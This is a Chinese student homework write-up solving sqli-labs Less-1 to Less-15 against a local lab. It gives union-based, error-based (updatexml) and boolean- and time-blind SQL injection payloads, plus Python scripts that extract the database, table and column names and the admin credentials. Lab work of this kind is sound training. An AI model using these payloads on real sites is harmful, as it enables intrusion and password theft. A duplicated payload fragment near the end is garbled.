sql注入作业

Dhakkan

less-1

id=-1’ uninon select 1,2,3 第一件事，闭合单引号，摆脱单引号控制

id=-1’是原因：有时网页往往只能回显一行数据，所以我们要让前面第一个select语句的返回值为空，才能让后面的第二个select语句回显出数据。

2个办法，继续把多出来的单引号闭合或者注释

mysql注释符：–空格（%20） # /***/ */ #会被浏览器编码，所以要写成%23

你需要知道联合查询的列数，求当前表的列数（我们用联合查询注入获取数据库中的数据。在进行联合查询前，我们必须知道当前表的字段数。因为联合查询中，使用union select拼接查询语句时，前后两个select返回的字段数必须相同，否则无法拼接。）

用order by 检测列数 ?id=1’ order by 3–+ 数字3代表第三列 （–+也能起到注释的作用）

让第一个表查询为空，给个无效id就行

最终目的，注入管理员账号密码

首先要知道库名，管理员表名，列名

?id=1' order by 3--+   检测列数
？id=-1' union select 1,user(),database()--+  注入当前数据库和用户 结果为security  root@localhost
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+  注入出表名 
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'--+  注入出列名 username,password
?id=-1' union select 1,group_concat(username),group_concat(password) from security.users--+  注入出管理员账号密码

自身理解：源代码基于某一个表查询，我们使用联合查询将需要的数据与原表联合（使用前需要知道原来的表有多少列），再让查询id取一个无效值，使原表数据不显示，此时回显位显示我们需要的数据。

less-2

less-2的id没有引号包裹，无需闭合单引号

?id=-1 union select 1,group_concat(username),group_concat(password) from security.users

less-3

id=1和id=1"是都为无错，id=1’时页面错误，并且提示"1") LIMIT 0,1’处有语法错误，我们发现参数还被括号包裹，那么我们闭合它

?id=-1') union select 1,group_concat(username),group_concat(password) from security.users--+ 

less-4

id=1和id=1’是都为无错，id=1"时页面错误，并且提示’“1"”) LIMIT 0,1’处有语法错误，我们发现参数被括号包裹，并且单引号变成了双引号。

?id=-1") union select 1,group_concat(username),group_concat(password) from security.users--+ 

less-5

id=1和id=1"时页面只有You are in…，id=1’时页面报错。

报错注入即通过特殊函数的错误使用使其参数被页面输出；前提：页面可以报错。

报错注入：?id=-1' and updatexml(1,concat(0x7e,(),0x7e),1)--+
?id=-1' and updatexml(1,concat(0x7e,database(),0x7e),1)--+ 查询数据名
?id=-1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+  注入表明
?id=-1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)--+ 注入出列名
?id=-1' and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from security.users),0x7e),1)--+ 注入出管理员账号密码  0x3a是 ：
updatexml报错注入函数长度是32字节，显示长度不够，所以需要使用substr函数截取
?id=-1' and updatexml(1,concat(0x7e,substr((select group_concat(username,0x3a,password) from security.users),32,64),0x7e),1)--+

个人理解：使用updatexml函数包裹查询语句

less-6

双引号闭合

?id=-1" and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from security.users),0x7e),1)--+

less-7

两个括号与单引号闭合

?id=-1')) and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from security.users),0x7e),1)--+

less-8

不显示报错信息，只有You are in… 和无显示两个状态

使用python脚本进行布尔盲注：

import time

import requests

url = 'http://127.0.0.1/sqllabs/Less-8/index.php'

def inject_database(url):
    name = ''
    for i in range(1, 20):
        for j in range(32, 129):
            payload = "1' and ascii(substr(database(), %d, 1)) = %d-- " % (i, j)
            res = {"id": payload}
            r = requests.get(url, params=res)
            if "You are in..........." in r.text:
                name = name + chr(j)
                print(name)
                break
            else:
                continue

inject_database(url)
注入表名的payload：
payload = "1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'), %d, 1)) = %d-- " % (i, j)
            res = {"id": payload}
注入列名的payload：
payload = "1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'), %d, 1)) = %d-- " % (i, j)
注入管理员账号密码的payload：
payload = "1' and ascii(substr((select group_concat(username,0x3a,password) from security.users), %d, 1)) = %d-- " % (i, j)

less-9

不论输入正确还是错误，都显示You are in… 无法进行布尔盲注，选择时间盲注：

import time

import requests

url = 'http://127.0.0.1/sqllabs/Less-9/index.php'

def inject_database(url):
    name = ''
    for i in range(1, 20):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "1' and if(ascii(substr(database(), %d, 1)) > %d, sleep(1), 0)-- " % (i, mid)
            res = {"id": payload}
            start_time = time.time()
            r = requests.get(url, params=res)
            end_time = time.time()
            if end_time - start_time >= 1:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2

        if mid == 32:
            break
        name = name + chr(mid)
        print(name)

inject_database(url)

注入表名的payload：
payload = "1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'), %d, 1)) > %d, sleep(1), 0)-- " % (i, mid)
注入列名的payload：
payload = "1' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'), %d, 1)) > %d, sleep(1), 0)-- " % (i, mid)
注入管理员账号密码的payload：
payload = "1' and if(ascii(substr((select group_concat(username,0x3a,password) from security.users), %d, 1)) > %d, sleep(1), 0)-- " % (i, mid)

less-10

与less-9的区别为双引号包含"$id "

在python中，由于payload语句中要使用" 所以用单引号标明这段代码
payload = '1" and if(ascii(substr(database(), %d, 1)) > %d, sleep(1), 0)-- ' % (i, mid)

less-11

port传参

a' union select group_concat(username),group_concat(password) from security.users#

less-12

双引号和括号闭合

a") union select group_concat(username),group_concat(password) from security.users#

less-13

报错注入

a') and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from security.users),0x7e),1)# 注入管理员账号密码
updatexml报错注入函数长度是32字节，显示长度不够，所以需要使用substr函数截取
a') and updatexml(1,concat(0x7e,substr((select group_concat(username,0x3a,password) from security.users),32,64),0x7e),1)#

less-14

双引号闭合 报错注入

a" and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from security.users),0x7e),1)#

less-15

不显示输出与报错，只有两个图片变化，使用布尔盲注：

import time

import requests

url = 'http://127.0.0.1/sqllabs/Less-15/index.php'

def inject_database(url):
    name = ''
    for i in range(1, 20):
        for j in range(32, 129):
            headers = {
                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0",
                "Content-Type": "application/x-www-form-urlencoded"
            }
            data = {"uname": "admin' and ascii(substr(database(), %d, 1)) = %d#" % (i, j), "passwd": "aaaaa"}
            r = requests.post(url, data=data)
            if "flag.jpg" in r.text:
                name = name + chr(j)
                print(name)
                break
            else:
                continue

inject_database(url)

注入表名的payload：
data = {"uname": "admin' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'), %d, 1)) = %d#" % (i, j), "passwd": "aaaaa"}
注入列名的payload：
data = {"uname": "admin' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'), %d, 1)) = %d#" % (i, j), "passwd": "aaaaa"}
注入管理员账号密码的payload：
data = {"uname": "admin' and ascii(substr((select group_concat(username,0x3a,password) from security.users), %d, 1)) = %d#" % (i, j), "passwd": "aaaaa"}

d, 1)) = %d#" % (i, j), “passwd”: “aaaaa”}
注入管理员账号密码的payload：
data = {“uname”: “admin’ and ascii(substr((select group_concat(username,0x3a,password) from security.users), %d, 1)) = %d#” % (i, j), “passwd”: “aaaaa”}

[外链图片转存中...(img-yktLfMlv-1722877110419)]